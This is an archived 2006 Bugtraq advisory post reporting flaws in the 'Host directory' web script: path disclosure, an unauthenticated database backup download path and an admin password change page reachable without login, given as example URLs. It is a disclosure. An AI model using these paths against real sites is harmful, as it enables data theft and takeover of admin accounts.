lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061227110547.11711.qmail@securityfocus.com>
Date: 27 Dec 2006 11:05:47 -0000
From: hack2prison@...oo.com
To: bugtraq@...urityfocus.com
Subject: Host directory full disclosure and input error

Host directory is a product of scriptsfrenzy.com and alstrasoft.com
I check lastest version and maybe infected lower versions. I contacted 
vendor 5 times in 2 months but not received any replies.
- FullPath disclosure: http://site.ext/path/ANY_INCORRECT_LINK
Warning: main(/home/user/public_html/include/ANY_INCORRECT_LINK.php): 
failed to open stream: No such file or directory in 
/home/user/public_html/include/main.php on line 25
- Backup database bypass: http://site.ext/path/admin/backup/db
- Change admin password without login: 
http://site.ext/path/admin/config

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ